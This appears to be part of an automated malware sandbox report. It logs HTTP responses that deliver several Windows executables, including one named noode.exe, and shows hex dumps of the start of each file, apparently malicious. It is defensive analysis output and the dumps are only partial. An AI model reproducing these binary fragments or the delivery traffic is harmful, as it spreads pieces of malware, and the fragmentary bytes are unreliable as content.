                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.1Date: Sat, 21 Sep 2024 11:33:41 GMTContent-Type: application/octet-streamContent-Length: 3129722Connection: keep-aliveX-Powered-By: PHP/7.4.33Content-Description: File TransferContent-Disposition: attachment; filename=noode.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 9e 00 00 00 46 00 00 00 00 00 00 f8 a5 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 50 09 00 00 00 10 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 30 9d 00 00 00 10 00 00 00 9e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 50 02 00 00 00 b0 00 00 00 04 00 00 00 a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 8c 0e 00 00 00 c0 00 00 00 00 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 50 09 00 00 00 d0 00 00 00 0a 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 e0 00 00 00 00 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 f0 00 00 00 02 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 c4 08 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 2c 00 00 00 10 01 00 00 2c 00 00 00 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 00 00 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZP
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 21 Sep 2024 11:33:41 GMTContent-Type: application/octet-streamContent-Length: 4249600Last-Modified: Sun, 15 Sep 2024 16:05:36 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66e705d0-40d800"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 5f 55 fb d1 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 9c 3e 00 00 38 02 00 00 00 00 00 ae ba 3e 00 00 20 00 00 00 c0 3e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 41 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 60 ba 3e 00 4b 00 00 00 00 e0 3e 00 84 2e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 41 00 0c 00 00 00 10 ba 3e 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 9a 3e 00 00 20 00 00 00 9c 3e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 84 04 00 00 00 c0 3e 00 00 06 00 00 00 a0 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 84 2e 02 00 00 e0 3e 00 00 30 02 00 00 a6 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 41 00 00 02 00 00 00 d6 40 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 21 Sep 2024 11:33:41 GMTContent-Type: application/octet-streamContent-Length: 361336Last-Modified: Fri, 20 Sep 2024 18:02:03 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66edb89b-58378"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0d b7 ed 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 50 05 00 00 08 00 00 00 00 00 00 ee 6e 05 00 00 20 00 00 00 80 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 6e 05 00 53 00 00 00 00 80 05 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 5a 05 00 78 29 00 00 00 a0 05 00 0c 00 00 00 60 6d 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 4e 05 00 00 20 00 00 00 50 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 05 00 00 00 80 05 00 00 06 00 00 00 52 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 05 00 00 02 00 00 00 58 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 6e 05 00 00 00 00 00 48 00 00 00 02 00 05 00 d8 5e 05 00 88 0e 00 00 03 00 02 00 0c 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 9a 24 d3 fa 09 ed 73 70 1d d9 10 6b b3 54 61 ce ca 81 de fd fe 7c e7 b4 4b e4 c3 3f 77 4e 05 10 b3 2d 18 d3 6d df 0d 45 a5 89 ee 8f 43 8d 39 ec a5 d3 9d 2d 23 0f dd 0c b9 66 92 cc 3d ba 9b 1b 35 73 70 4a fe c5 d8 0f fd ee a3 7a 03 73 d5 d2 5f 34 76 15 5a 55 4f c7 91 77 a3 b4 81 62 fd 0c 01 6e 65 bf 73 52 13 b9 76 40 73 4f d6 34 d0 9d 5d 20 0d ee 1c ff 14 a1 56 c3 4c 93 f6 87 1e d4 b7 54 56 5b 1b 58 ec 76 46 04 19 02 b7 f1 c9 7c be e1 68 49 2a b7 d6 9c 24 3c 67 62 f3 e2 e1 76 2d 43 6d 3c 5b 36 52 b2 13 9f 38 a9 e7 86 21 6d 8a b8 bf ac 8c 97 be 87 8a 96 27 bd 3f 6a ee 8f d9 17 a1 57 60 4a 49 e9 c2 21 6b 0a d2 ca bf a3 e0 f1 aa c9 d5 2c 84 4f bd 3c 39 ea c1 57 a9 f9 86 58 ef 97 fe 4c 45 71 f3 d2 07 af 20 21 8c 88 cb d2 e6 f6 51 d9 a2 d9 92 24 bb 40 b3 d8 ef 03 2c 39 39 1b b7 7e 93 cc c8 25 28 f1 e4 d5 5c 16 c7 7c 42 88 1d 23 b2 61 84 fe ef 20 b5 97 d9 1c 0b 85 77 b9 ea b1 5a 56 92 ca 39 b9 6b 8
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 21 Sep 2024 11:33:42 GMTContent-Type: application/octet-streamContent-Length: 3037032Last-Modified: Thu, 19 Sep 2024 05:16:47 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66ebb3bf-2e5768"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ba f7 20 98 fe 96 4e cb fe 96 4e cb fe 96 4e cb f7 ee dd cb ec 96 4e cb 60 36 89 cb ff 96 4e cb 1b cf 4b ca fc 96 4e cb 23 69 80 cb fa 96 4e cb 23 69 85 cb f0 96 4e cb c5 c8 4d ca f8 96 4e cb c5 c8 4a ca f0 96 4e cb c5 c8 4b ca df 96 4e cb c5 c8 4f ca f8 96 4e cb d9 50 35 cb fc 96 4e cb 69 c8 4f ca d3 96 4e cb fe 96 4f cb 3a 9d 4e cb 69 c8 4b ca a1 96 4e cb 69 c8 4e ca ff 96 4e cb 6c c8 b1 cb ff 96 4e cb fe 96 d9 cb ff 96 4e cb 69 c8 4c ca ff 96 4e cb 52 69 63 68 fe 96 4e cb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 81 9f 25 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 38 12 00 00 02 1c 00 00 00 00 00 1e 24 10 00 00 10 00 00 00 50 12 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 2e 00 00 04 00 00 9a d5 21 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 90 25 18 00 c4 a8 00 00 54 ce 18 00 5c 03 00 00 00 20 1b 00 d8 66 13 00 00 00 00 00 00 00 00 00 00 3e 2e 00 68 19 00 00 00 d0 1f 00 90 09 02 00 90 29 15 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 2a 15 00 18 00 00 00 e8 29 15 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 12 00 b8 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 40 12 00 00 10 00 00 00 38 12 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 00 30 08 00 00 50 12 00 00 28 08 00 00 3c 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 80 00 00 00 80 1a 00 00 6e 00 00 00 64 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 00 10 00 00 00 00 1b 00 00 02 00 00 00 d2 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 00 10 00 00 00 10 1b 00 00 02 00 00 00 d4 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 d8 66 13 00 00 20 1b 00 00 68 13 00 00 d6 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 21 Sep 2024 11:33:44 GMTContent-Type: application/octet-streamContent-Length: 418816Last-Modified: Sat, 21 Sep 2024 07:43:45 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66ee7931-66400"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4d ba df d9 09 db b1 8a 09 db b1 8a 09 db b1 8a 66 ad 1a 8a 1b db b1 8a 66 ad 2f 8a 06 db b1 8a 66 ad 1b 8a 5c db b1 8a 00 a3 22 8a 02 db b1 8a 09 db b0 8a 86 db b1 8a 66 ad 1e 8a 08 db b1 8a 66 ad 2b 8a 08 db b1 8a 66 ad 2c 8a 08 db b1 8a 52 69 63 68 09 db b1 8a 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 12 f6 25 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 48 03 00 00 b4 04 02 00 00 00 00 7e 3e 00 00 00 10 00 00 00 60 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 07 02 00 04 00 00 c5 b4 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 4a 03 00 78 00 00 00 00 10 05 02 e8 bc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c 4b 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2a 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 24 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6a 47 03 00 00 10 00 00 00 48 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 8c ac 01 02 00 60 03 00 00 5a 00 00 00 4c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 bc 02 00 00 10 05 02 00 be 02 00 00 a6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 21 Sep 2024 11:33:44 GMTContent-Type: application/octet-streamContent-Length: 11496960Last-Modified: Wed, 18 Sep 2024 05:25:37 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66ea6451-af6e00"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 0a 00 ad 2b dd 66 00 00 00 00 00 00 00 00 f0 00 23 00 0b 02 0e 00 00 82 00 00 00 06 cd 00 00 00 00 00 5d 70 fd 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 a8 01 00 04 00 00 00 00 00 00 02 00 20 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 d1 fd 00 3c 00 00 00 00 50 a5 01 d8 04 03 00 40 16 a5 01 60 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 46 00 01 28 00 00 00 00 15 a5 01 38 01 00 00 00 00 00 00 00 00 00 00 00 d0 f8 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 36 81 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b8 1e 00 00 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 88 e7 c9 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 80 01 00 00 00 b0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 10 00 00 00 00 c0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 10 00 00 00 00 d0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 30 00 00 70 e4 2d 00 00 e0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 31 00 00 58 00 00 00 00 d0 f8 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 32 00 00 a0 60 ac 00 00 e0 f8 00 00 62 ac 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 2e 72 73 72 63 00 00 00 d8 04 03 00 00 50 a5 01 00 06 03 00 00 68 ac 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 21 Sep 2024 11:33:45 GMTContent-Type: application/octet-streamContent-Length: 3141632Last-Modified: Fri, 20 Sep 2024 15:45:09 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66ed9885-2ff000"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 b2 1e 9f cc 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 0a 29 00 00 e2 06 00 00 00 00 00 ee 29 29 00 00 20 00 00 00 40 29 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 30 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 a0 29 29 00 4b 00 00 00 00 60 29 00 bc d8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 30 00 0c 00 00 00 4f 29 29 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 09 29 00 00 20 00 00 00 0a 29 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 f4 05 00 00 00 40 29 00 00 06 00 00 00 0e 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 bc d8 06 00 00 60 29 00 00 da 06 00 00 14 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 30 00 00 02 00 00 00 ee 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 21 Sep 2024 11:33:47 GMTContent-Type: application/octet-streamContent-Length: 331640Last-Modified: Sat, 21 Sep 2024 10:55:47 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66eea633-50f78"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 3d a1 ee 66 00 00 00 00 00 00 00 00 e0 00 02 01 